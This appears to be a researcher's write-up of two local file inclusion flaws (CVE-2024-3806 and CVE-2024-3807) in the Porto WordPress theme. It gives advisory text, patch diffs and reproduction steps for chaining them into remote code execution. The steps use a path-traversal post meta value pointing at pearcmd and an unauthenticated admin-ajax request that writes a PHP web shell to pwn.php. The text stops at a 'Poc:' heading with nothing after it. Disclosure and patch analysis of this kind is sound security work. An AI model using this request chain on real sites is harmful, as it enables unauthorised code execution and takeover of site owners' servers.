CVE-2024-3806: Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts CVE-2024-3807: Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta
Porto 7.1.0: https://drive.google.com/file/d/1BWJ_xfjNetogvfMqKzXtAWEvRJOGa4DF/view?usp=sharing
Porto 7.1.1: https://drive.google.com/file/d/1AQrwMDVkbSIPWNfWhyR_ynJHW0dB9_21/view?usp=sharing
- CVE-2024-3806: Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/porto/porto-710-unauthenticated-local-file-inclusion-via-porto-ajax-posts
Description The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.
Diff function porto_ajax_posts File: inc\functions\post.php
Old: $post_layout = isset( $_REQUEST['post_layout'] ) ? $_REQUEST['post_layout'] : null;
New: $post_layout = isset( $_REQUEST['post_layout'] ) ? sanitize_file_name( $_REQUEST['post_layout'] ) : null;
Old: get_template_part( 'content-blog', $post_layout );
New: get_template_part( 'content-blog', sanitize_file_name( $post_layout ) );
- CVE-2024-3807: Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/porto/porto-710-authenticated-contributor-local-file-inclusion-via-post-meta
Description The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via 'porto_page_header_shortcode_type', 'slideshow_type' and 'post_layout' post meta. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included. This was partially patched in version 7.1.0 and fully patched in version 7.1.1.
Diff File content-blog-full.php: $slideshow_type change to sanitize_file_name( $slideshow_type )
$slideshow_type = get_post_meta( get_the_ID(), 'slideshow_type', true ); => get_post_meta()` is used to get the value of a specific "slideshow_type" from a WordPress post.
get_the_ID(): https://developer.wordpress.org/reference/functions/get_the_id/
- CVE-2024-3806 + CVE-2024-3807 => RCE
File: inc\functions\post.php function porto_ajax_posts
I control variable $post_type = $_REQUEST['post_type'];
and $post_layout = isset( $_REQUEST['post_layout'] ) ? $_REQUEST['post_layout'] : null;
I need $post_type value "post" and $post_layout value "full"
content-blog-full.php
File: inc\functions\general.php => function porto_get_template_part
Steps to Reproduce:
- Create post with slideshow_type value:
../../../../../../../../../usr/local/lib/php/pearcmd
- Send Request
No login required to access: <Host>/wp-admin/admin-ajax.php?action=porto_ajax_posts&post_type=post&post_layout=full&+config-create+/&/<?=`$_GET[0]`?>+/var/www/html/pwn.php
or
No login required to access: <Host>/wp-admin/admin-ajax.php?action=porto_ajax_posts&post_type=post&post_layout=full&+config-create+/&/<?=`$_GET[0]`?>+/var/www/html/pwn.php&nonce={{porto_nonce}}
Poc: